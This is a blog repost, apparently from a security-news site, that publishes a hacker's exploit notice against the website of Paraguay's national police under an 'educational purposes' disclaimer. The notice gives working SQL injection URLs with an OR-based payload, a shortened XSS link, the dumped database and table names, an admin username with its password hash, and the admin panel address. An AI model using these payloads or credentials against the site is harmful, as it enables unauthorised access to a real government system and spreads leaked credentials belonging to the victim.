As always, this information is for educational purposes. We show these compromised systems so that you understand the current threat environment that surrounds us every day and how significant it is to take the appropriate countermeasures to safeguard your critical data, no matter what size your organization is, as well as your individual data-driven devices. Below is a POC of the exploit/compromise. Again, as always, be proactive, not reactive, in safeguarding your critical data, and stay safe out there. As you are aware, this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures, such as those described in ISO13335, to prevent yourselves from becoming victims in the current threat environment.
The exploit is provided below as I will continue to monitor the net to safeguard systems and individuals' critical data. Additionally, this information is provided to our readers as an addendum to the California Database Security Breach Act.
######################Exploit#######################
# Exploit Title: SQL/XSS POLICIA NACIONAL PARAGUAY
#
# Exploit Author: YeiZeta
#
# Category: Web Application
#
##############################################
TABLETAS:
admin,agrupaciones,albumes,habilidades,imagenes,institucional,museoFotos,museoGalery,novedades,revistas,tramites,videos
Current DB: policiaNacional
XSS:
http://bit.ly/UZYN7E
SQL:
http://www.policianacional.gov.py/galeria_visor.php?id=1´
http://www.policianacional.gov.py/g_tramites.php?tipo=%27+OR+%27ns%27%3d%27ns&titulo=TRAMITES
Admin Login:
USUARIO:policia
contraseña:d173cab476c3c881fdc89b0dcfc18e95
http://www.policianacional.gov.py/admin/view/cms/
##############################################
https://www.facebook.com/TheJokerHack
##############################################
//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information.